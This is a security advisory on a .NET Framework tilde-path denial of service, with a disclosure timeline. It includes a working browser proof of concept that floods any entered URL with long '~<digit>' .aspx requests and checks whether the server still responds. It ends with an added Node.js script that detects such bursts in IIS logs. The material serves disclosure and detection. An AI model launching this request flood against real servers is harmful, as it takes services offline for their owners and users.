Paper: http://www.exploit-db.com/docs/19527.pdf

Security Research - .Net Framework Tilde Character DoS

Website : http://soroush.secproject.com/blog/

I. BACKGROUND
---------------------
"The .NET Framework is a software framework developed by Microsoft that runs primarily on Microsoft Windows. It includes a large library and provides language interoperability across several programming languages." (Wikipedia)

II. DESCRIPTION
---------------------
The Vulnerability Research Team discovered a vulnerability in Microsoft .NET Framework. The vulnerability is triggered by tilde characters "~" in the path of a GET request (the marker used in Windows 8.3 short file/folder names). A burst of requests whose paths consist of many such "~<digit>" segments keeps the server busy for a long time, which could allow remote attackers to deny service on the server. The proof of concept below sends such a burst from a browser and uses the time the last request takes to be answered as a rough indicator of whether the target is affected.

III. AFFECTED PRODUCTS
---------------------------
.Net Framework 1.0 - Windows XP
.Net Framework 1.1 - Windows 2003
.Net Framework 2.0 - Windows 2003 R2
.Net Framework 3.0 - Windows 2008
.Net Framework 3.5 - Windows 2008 R2
.Net Framework 4.0 - Windows 2008 R2, Windows 7

IV. Binary Analysis & Exploits/PoCs
---------------------------------------
In-depth technical analysis of the vulnerability and a functional exploit are available through:
http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/

V. SOLUTION
----------------
No fix is available for the listed versions; the vendor's second response (see the timeline) was that a fix would go into the next version. Workarounds are available from the vendor and from security vendors; the Microsoft KB article in the references covers 8.3 short-name generation on NTFS, which is what the tilde in the request refers to.

VI. CREDIT
--------------
This vulnerability was discovered by:
Soroush Dalili (@irsdl)
Ali Abbasnejad

VII. REFERENCES
----------------------
http://support.microsoft.com/kb/142982/en-us
http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/

VIII. DISCLOSURE TIMELINE
-----------------------------
2010-08-01 - Vulnerability Discovered
2010-08-03 - Vendor Informed
2010-12-01 - Vendor 1st Response
2011-01-04 - Vendor 2nd Response (next version fix)
2012-06-29 - Public Disclosure

Proof of Concept:

<html>
<head>
<script>
var requestNumber = 10; // enough for the test - otherwise it may stop your .Net framework completely

// A string of 4096 "A"s; each "A" is later replaced by one "/~<digit>" path segment.
var tempValue = "A";
while (tempValue.length < 4000) { // 4096 then!
    tempValue += tempValue;
}

var errorFlag;
var from_time;
var to_time;

function testTheTarget(strTarget, intValidFolderCount, intLoopNumber, HTMLElementDest) {
    HTMLElementDest.innerHTML = '';
    errorFlag = 0;
    from_time = new Date();
    from_time = from_time.getTime();
    if (isTargetValid(strTarget)) {
        // The values come from text inputs; fall back to 100 and make them numeric.
        if (isNaN(intValidFolderCount)) intValidFolderCount = 100;
        if (isNaN(intLoopNumber)) intLoopNumber = 100;
        intValidFolderCount = parseInt(intValidFolderCount, 10);
        requestNumber = parseInt(intLoopNumber, 10);
        var div = document.createElement("div");
        for (var i = 0; i < requestNumber; i++) {
            // (intValidFolderCount - 1) segments of the form "/~<digit>" ...
            var testTempValue = tempValue.substring(0, intValidFolderCount - 1);
            testTempValue = testTempValue.replace(/A/gi, "/~" + Math.floor(Math.random() * 10) + "");
            // ... ending in an .aspx resource with an aspxerrorpath parameter ...
            testTempValue += ".AsPx?aspxerrorpath=/";
            // ... prefixed with a first segment built from the current milliseconds and a
            // random digit, so that every request URL differs and none is served from cache.
            testTempValue = "/" + (new Date()).getMilliseconds() + "~" + Math.floor(Math.random() * 10) + testTempValue;
            var img = createElement("img", "img_" + i);
            if (i == requestNumber - 1) {
                // The last image's error handler fires when the server finally answers
                // (with a non-image response); compare the elapsed time with a generous budget.
                img.onerror = function () {
                    to_time = new Date();
                    to_time = to_time.getTime();
                    var msecs = (to_time - from_time);
                    if (!errorFlag && msecs < 100 * requestNumber + 5000) {
                        errorFlag = 1;
                        if (intValidFolderCount >= 150)
                            alert('As you can see this message, you probably need to decrease the Maximum Valid Folder number.');
                        else if (intValidFolderCount >= 50) {
                            alert('First increase the Maximum Valid Folder number to see the behaviour, then decrease it to lower than ' + intValidFolderCount + ' and then see the behaviour.');
                        } else
                            alert('The response was too quick. This server probably is not vulnerable.');
                    }
                };
            }
            img.src = strTarget + testTempValue;
            div.appendChild(img);
        }
        HTMLElementDest.appendChild(div);
    } else {
        alert('Your target URL is not valid. Examples: \nhttp://www.aspnet-example.com/ \nor \nhttps://www.aspnet-example.com/');
    }
}

var myTargetWindow;
var objSetTimeout;

function openInNewWin(strTarget) {
    clearTimeout(objSetTimeout);
    if (isTargetValid(strTarget)) {
        myTargetWindow = window.open(strTarget, '_blank');
        objSetTimeout = setTimeout(isServerAlive, 10000);
    }
}

// Crude liveness check, run 10 seconds after opening the target in a new window:
// if the target page loaded, its location is cross-origin and reading it throws
// (alive). If the window is still blank, the location is readable and does not
// contain the host, so the server is assumed dead. The '//localhost' check covers
// the same-origin case where the PoC itself is served from the target host.
function isServerAlive() {
    try {
        var dummy = myTargetWindow.location;
        if (myTargetWindow.location.toString().indexOf('//localhost') < 0)
            alert('No response from the server! Seems dead to me!');
    } catch (e) {
        // Nothing ... it is alive and safe...
    }
}

function isTargetValid(strTarget) {
    var result = false;
    try {
        if (strTarget.substring(0, 7).toLowerCase() == "http://" || strTarget.substring(0, 8).toLowerCase() == "https://") {
            result = true;
        }
    } catch (e) {}
    return result;
}

// Creates a named element. The first branch is the legacy Internet Explorer syntax
// that sets name/id at creation time; the catch branch is the standard DOM way.
function createElement(elmType, elmName) {
    var element;
    if (elmName == '') {
        element = document.createElement(elmType);
    } else {
        try {
            element = document.createElement('<' + elmType + ' name="' + elmName + '" id="' + elmName + '">');
        } catch (ex) {
            element = document.createElement(elmType);
            element.name = elmName;
            element.id = elmName;
        }
    }
    return element;
}
</script>
</head>
<body>
You have to monitor the server performance manually:<br/>
Target website: <input type="text" name="target" id="target" value="http://localhost/"/> Example: http://www.aspnet-example.com/ or https://www.aspnet-example.com/ - Do not include filename<br/>
Maximum valid folder that can be added to your target: <input type="text" name="validfoldercount" id="validfoldercount" value="200"/> before receiving URL Too Long error<br/>
Loop Number: <input type="text" name="loopnumber" id="loopnumber" value="100"/> be careful as it can kill your server.<br/>
<input type="button" value="Test it" onclick="testTheTarget(document.getElementById('target').value,document.getElementById('validfoldercount').value,document.getElementById('loopnumber').value,document.getElementById('playground'))"/>
<input type="button" value="Open the target website" onclick="openInNewWin(document.getElementById('target').value)"/><br/>
<div style="visibility:hidden;" name="playground" id="playground">
Hidden Div! -playground-
</div>
<br/><br/><br/><br/>
We do not accept any responsibility for bad usage of this PoC. Please only run it against your own server/websites.
<br/><br/>
Main reference: <a href="http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/">http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/</a>
</body>
</html>
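The following Node.js script is an added example and is not part of the advisory or of the authors' PoC. It rebuilds the request shape the PoC's loop generates (so the server-side footprint of the test is explicit) and then scans IIS W3C extended log lines for that shape, aggregating per client so a burst of tilde probes that burns server time can be told apart from a single stray request. The log lines are constructed for the example; the field order is the default IIS 7.x `#Fields` list and the thresholds in `suspectedDosClients` are assumptions to be tuned against a real baseline.

```javascript
"use strict";

// Added example, not part of the original advisory. Rebuilds the request shape the PoC
// generates and detects that shape in IIS W3C extended log lines.

// Same construction as the PoC's loop: a leading "/<ms>~<digit>" segment, then
// (validFolderCount - 1) "/~<digit>" segments, then ".AsPx?aspxerrorpath=/".
// The digit source defaults to the PoC's Math.random(); a fixed one makes output reproducible.
function buildProbePath(validFolderCount, ms, digit = () => Math.floor(Math.random() * 10)) {
  let path = "/" + ms + "~" + digit();
  for (let i = 0; i < validFolderCount - 1; i++) {
    path += "/~" + digit();
  }
  return path + ".AsPx?aspxerrorpath=/";
}

// Field order of the default IIS 7.x W3C log format (assumed for the constructed sample).
const FIELDS = [
  "date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "s-port",
  "cs-username", "c-ip", "cs(User-Agent)", "sc-status", "sc-substatus",
  "sc-win32-status", "time-taken",
];

// Parse one log line into an object keyed by field name; returns null for
// directives (#Software, #Fields, ...) and malformed lines.
function parseW3cLine(line) {
  const trimmed = line.trim();
  if (trimmed === "" || trimmed.startsWith("#")) return null;
  const parts = trimmed.split(/\s+/);
  if (parts.length < FIELDS.length) return null;
  const rec = {};
  FIELDS.forEach((name, i) => { rec[name] = parts[i]; });
  rec["sc-status"] = Number(rec["sc-status"]);
  rec["time-taken"] = Number(rec["time-taken"]);
  return rec;
}

// Number of path segments carrying an 8.3 short-name marker: "~" followed by a digit.
// "logo~v2.png" is not counted; "~1", "513~4" and "~0.AsPx" are.
function tildeSegmentCount(uriStem) {
  return uriStem.split("/").filter((seg) => /~\d/.test(seg)).length;
}

// Scan log lines: return every request with at least one short-name segment and a
// per-client summary (probe count, deepest path seen, total server time spent).
function scanIisLog(lines) {
  const hits = [];
  const byClient = new Map();
  for (const line of lines) {
    const rec = parseW3cLine(line);
    if (!rec) continue;
    const segments = tildeSegmentCount(rec["cs-uri-stem"]);
    if (segments === 0) continue;
    hits.push({ client: rec["c-ip"], stem: rec["cs-uri-stem"], segments,
                status: rec["sc-status"], timeTaken: rec["time-taken"] });
    const agg = byClient.get(rec["c-ip"]) || { probes: 0, maxSegments: 0, totalMs: 0 };
    agg.probes += 1;
    agg.maxSegments = Math.max(agg.maxSegments, segments);
    agg.totalMs += rec["time-taken"];
    byClient.set(rec["c-ip"], agg);
  }
  return { hits, byClient };
}

// Clients that look like the PoC: repeated tilde probes and a lot of server time consumed.
// The thresholds are assumptions for the example; tune them to the site's baseline.
function suspectedDosClients(byClient, minProbes, minTotalMs) {
  const out = [];
  for (const [ip, agg] of byClient) {
    if (agg.probes >= minProbes && agg.totalMs >= minTotalMs) out.push(ip);
  }
  return out.sort();
}

// Constructed sample log (not real traffic). User-agent spaces are "+" as IIS writes them.
const SAMPLE_LOG = [
  "#Software: Microsoft Internet Information Services 7.5",
  "#Fields: " + FIELDS.join(" "),
  "2012-06-29 10:15:01 10.0.0.5 GET /default.aspx - 80 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1) 200 0 0 15",
  "2012-06-29 10:15:01 10.0.0.5 GET /images/logo~v2.png - 80 - 198.51.100.9 Mozilla/5.0+(Windows+NT+6.1) 200 0 0 4",
  "2012-06-29 10:15:02 10.0.0.5 GET /~1/.aspx - 80 - 203.0.113.4 Mozilla/5.0+(Windows+NT+6.1) 404 0 0 3",
  "2012-06-29 10:15:02 10.0.0.5 GET /513~4/~2/~7/~0.AsPx aspxerrorpath=/ 80 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1) 500 0 0 8210",
  "2012-06-29 10:15:03 10.0.0.5 GET /877~1/~9/~3.AsPx aspxerrorpath=/ 80 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1) 500 0 0 7950",
];

// Run the scan over the sample and return everything worth inspecting.
function demo() {
  const { hits, byClient } = scanIisLog(SAMPLE_LOG);
  return {
    examplePath: buildProbePath(4, 513, () => 7),
    hits,
    summary: Object.fromEntries(byClient),
    suspects: suspectedDosClients(byClient, 2, 5000),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The segment filter keys on "~" followed by a digit rather than on any tilde, so ordinary resource names that happen to contain one are not flagged, and the per-client aggregation adds up `time-taken` because the effect described in the advisory is server time consumed, which request volume alone does not capture.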